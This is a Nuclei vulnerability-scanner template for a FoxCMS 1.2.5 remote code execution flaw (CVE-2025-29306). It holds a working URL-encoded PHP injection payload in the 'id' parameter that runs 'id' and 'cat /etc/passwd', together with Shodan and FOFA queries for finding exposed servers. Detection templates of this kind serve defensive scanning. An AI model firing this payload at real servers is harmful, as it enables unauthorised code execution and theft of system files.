id: CVE-2025-29306 info: name: FoxCMS v.1.2.5 - Remote Code Execution author: ritikchaddha severity: critical description: | An issue in FoxCMS v.1.2.5 allows a remote attacker to execute arbitrary code via the case display page in the index.html component. impact: | Unauthenticated attackers can execute arbitrary code through the id parameter in the index.html component, leading to complete server compromise. remediation: | Update to the latest version of FOXCMS if available. If no patch is available,implement WAF rules to block malicious requests to the /images/index.html endpoint with suspicious 'id' parameter values. reference: - https://github.com/verylazytech/CVE-2025-29306/blob/main/CVE-2025-29306.sh - https://medium.com/@verylazytech - https://nvd.nist.gov/vuln/detail/CVE-2025-29306 classification: epss-score: 0.86208 epss-percentile: 0.99422 cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2025-29306 cwe-id: CWE-94 metadata: verified: true max-request: 1 fofa-query: (body="foxcms-logo" || body="foxcms-container") && body="div" google-query: intitle:"FOXCMS" intext:"foxcms-logo" shodan-query: html:"foxcms-logo" tags: cve,cve2025,rce,foxcms,unauth,oast,vkev,vuln http: - method: GET path: - "{{BaseURL}}/images/index.html?id=%24%7B%40print_r%28%40system%28%22{{command}}%22%29%29%7D" payloads: command: - "id" - "cat /etc/passwd" stop-at-first-match: true matchers-condition: and matchers: - type: regex part: body regex: - "uid=[0-9]+\\(\\w+\\) gid=[0-9]+\\(\\w+\\)" - "root:.*:0:0:" condition: or - type: word part: body words: - "foxcms" case-insensitive: true - type: status status: - 200 # digest: 4a0a0047304502200cef2e3f020516d15849c68d80dad9b97f38389438bf286cf0f0cd46e4afe960022100dea707cbc4647832ac35678a36153d06e19120ff2f670086f7ff5fd341c931e4:922c64590222798bb761d5b6d8e72950